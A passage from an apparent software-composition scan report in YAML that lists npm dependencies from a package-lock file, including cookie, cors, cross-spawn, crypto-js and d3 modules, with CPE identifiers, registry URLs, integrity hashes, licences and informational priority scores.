language: javascript
cpes:
- cpe: cpe:2.3:a:content-type:content-type:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content-type:content_type:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content_type:content-type:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content_type:content_type:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content:content-type:1.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:content:content_type:1.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/content-type@1.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz
integrity: sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 475f89190adc46cd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cookie 0.7.2'
title: cookie 0.7.2
description: 'Package discovered: cookie 0.7.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dabea341270367ac
name: cookie
version: 0.7.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cookie:cookie:0.7.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/cookie@0.7.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cookie/-/cookie-0.7.2.tgz
integrity: sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 980ccdca1420305a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cookie-signature 1.0.7'
title: cookie-signature 1.0.7
description: 'Package discovered: cookie-signature 1.0.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c3cdc836e23cbee4
name: cookie-signature
version: 1.0.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cookie-signature_project:cookie-signature:1.0.7:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/cookie-signature@1.0.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.7.tgz
integrity: sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8ea7108a43fc0ad4
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: core-util-is 1.0.3'
title: core-util-is 1.0.3
description: 'Package discovered: core-util-is 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9bfb1fb9a1cd315e
name: core-util-is
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:core-util-is:core-util-is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core-util-is:core_util_is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core_util_is:core-util-is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core_util_is:core_util_is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core-util:core-util-is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core-util:core_util_is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core_util:core-util-is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core_util:core_util_is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core:core-util-is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:core:core_util_is:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/core-util-is@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz
integrity: sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 171e24f79e6f61b0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cors 2.8.6'
title: cors 2.8.6
description: 'Package discovered: cors 2.8.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c8f0caa18c740c23
name: cors
version: 2.8.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cors:cors:2.8.6:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/cors@2.8.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cors/-/cors-2.8.6.tgz
integrity: sha512-tJtZBBHA6vjIAaF6EnIaq6laBBP9aq/Y3ouVJjEfoHbRBcHBAHYcMh/w8LDrk2PvIMMq8gmopa5D4V8RmbrxGw==
dependencies:
object-assign: ^4
vary: ^1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 24841e3ab0fadbb6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
startLine: 0
message: 'Package discovered: coverallsapp/github-action master'
title: coverallsapp/github-action master
description: 'Package discovered: coverallsapp/github-action master'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: cbf693155383c51f
name: coverallsapp/github-action
version: master
type: github-action
foundBy: github-actions-usage-cataloger
locations:
- path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml
annotations:
evidence: primary
licenses: []
language: ''
cpes:
- cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github-action:master:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github_action:master:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github-action:master:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github_action:master:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github-action:master:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github_action:master:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:github/coverallsapp/github-action@master
metadataType: github-actions-use-statement
metadata:
value: coverallsapp/github-action@master
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c42474dc158d56dd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cross-fetch 3.2.0'
title: cross-fetch 3.2.0
description: 'Package discovered: cross-fetch 3.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1ef521ded724ae55
name: cross-fetch
version: 3.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cross-fetch_project:cross-fetch:3.2.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/cross-fetch@3.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.2.0.tgz
integrity: sha512-Q+xVJLoGOeIMXZmbUK4HYk+69cQH6LudR0Vu/pRm2YlU/hDV9CiS0gKUMaWY5f2NeUH9C1nV3bsTlCo0FsTV1Q==
dependencies:
node-fetch: ^2.7.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ab79d32b8583840a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cross-spawn 7.0.6'
title: cross-spawn 7.0.6
description: 'Package discovered: cross-spawn 7.0.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 043761526fd95886
name: cross-spawn
version: 7.0.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cross-spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cross-spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cross_spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cross_spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cross:cross-spawn:7.0.6:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:cross:cross_spawn:7.0.6:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/cross-spawn@7.0.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz
integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==
dependencies:
path-key: ^3.1.0
shebang-command: ^2.0.0
which: ^2.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8714b6edd2c6df07
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: crypto-js 4.2.0'
title: crypto-js 4.2.0
description: 'Package discovered: crypto-js 4.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2eb6177b3fd9fb78
name: crypto-js
version: 4.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:crypto-js:crypto-js:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:crypto-js:crypto_js:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:crypto_js:crypto-js:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:crypto_js:crypto_js:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:crypto:crypto-js:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:crypto:crypto_js:4.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/crypto-js@4.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/crypto-js/-/crypto-js-4.2.0.tgz
integrity: sha512-KALDyEYgpY+Rlob/iriUtjV6d5Eq+Y191A5g4UqLAi8CyGP9N1+FdVbkc1SxKc2r4YAYqG8JzO2KGL+AizD70Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5c9f6165bd9afd4d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: cssesc 3.0.0'
title: cssesc 3.0.0
description: 'Package discovered: cssesc 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7ab312baa29fde7a
name: cssesc
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:cssesc:cssesc:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/cssesc@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz
integrity: sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e510323d242254fb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: csstype 3.2.3'
title: csstype 3.2.3
description: 'Package discovered: csstype 3.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7a5abc30c1904007
name: csstype
version: 3.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:csstype:csstype:3.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/csstype@3.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz
integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bd9d3c33974e198d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-array 3.2.4'
title: d3-array 3.2.4
description: 'Package discovered: d3-array 3.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d16a22647e62d254
name: d3-array
version: 3.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-array:d3-array:3.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-array:d3_array:3.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_array:d3-array:3.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_array:d3_array:3.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-array:3.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_array:3.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-array@3.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-array/-/d3-array-3.2.4.tgz
integrity: sha512-tdQAmyA18i4J7wprpYq8ClcxZy3SC31QMeByyCFyRt7BVHdREQZ5lpzoe5mFEYZUWe+oq8HBvk9JjpibyEV4Jg==
dependencies:
internmap: 1 - 2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fe81bed2b7c1ca62
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-color 3.1.0'
title: d3-color 3.1.0
description: 'Package discovered: d3-color 3.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 633ef642a5395c1a
name: d3-color
version: 3.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-color:d3-color:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-color:d3_color:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_color:d3-color:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_color:d3_color:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-color:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_color:3.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-color@3.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-color/-/d3-color-3.1.0.tgz
integrity: sha512-zg/chbXyeBtMQ1LbD/WSoW2DpC3I0mpmPdW+ynRTj/x2DAWYrIY7qeZIHidozwV24m4iavr15lNwIwLxRmOxhA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d9ebb131f790b372
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-ease 3.0.1'
title: d3-ease 3.0.1
description: 'Package discovered: d3-ease 3.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5c5a953bcb066b0e
name: d3-ease
version: 3.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-ease:d3-ease:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-ease:d3_ease:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_ease:d3-ease:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_ease:d3_ease:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-ease:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_ease:3.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-ease@3.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-ease/-/d3-ease-3.0.1.tgz
integrity: sha512-wR/XK3D3XcLIZwpbvQwQ5fK+8Ykds1ip7A2Txe0yxncXSdq1L9skcG7blcedkOX+ZcgxGAmLX1FrRGbADwzi0w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fe1c10f297b89c50
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-format 3.1.2'
title: d3-format 3.1.2
description: 'Package discovered: d3-format 3.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5199669646af57ab
name: d3-format
version: 3.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-format:d3-format:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-format:d3_format:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_format:d3-format:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_format:d3_format:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-format:3.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_format:3.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-format@3.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-format/-/d3-format-3.1.2.tgz
integrity: sha512-AJDdYOdnyRDV5b6ArilzCPPwc1ejkHcoyFarqlPqT7zRYjhavcT3uSrqcMvsgh2CgoPbK3RCwyHaVyxYcP2Arg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d580ebf8b65eecc5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-interpolate 3.0.1'
title: d3-interpolate 3.0.1
description: 'Package discovered: d3-interpolate 3.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2bcd6b2445ac379d
name: d3-interpolate
version: 3.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:d3-interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3-interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3_interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3-interpolate:3.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:d3:d3_interpolate:3.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/d3-interpolate@3.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/d3-interpolate/-/d3-interpolate-3.0.1.tgz
integrity: sha512-3bYs1rOD33uo8aqJfKP3JWPAibgw8Zm2+L9vBKEHJ2Rg+viTR7o5Mmv5mZcieN+FRYaAOWX5SJATX6k1PWz72g==
dependencies:
d3-color: 1 - 3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9d53314d3544b04e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: d3-path 3.1.0'
title: d3-path 3.1.0
description: 'Package discovered: d3-path 3.1.0'
remediation: Track and scan dependencies.
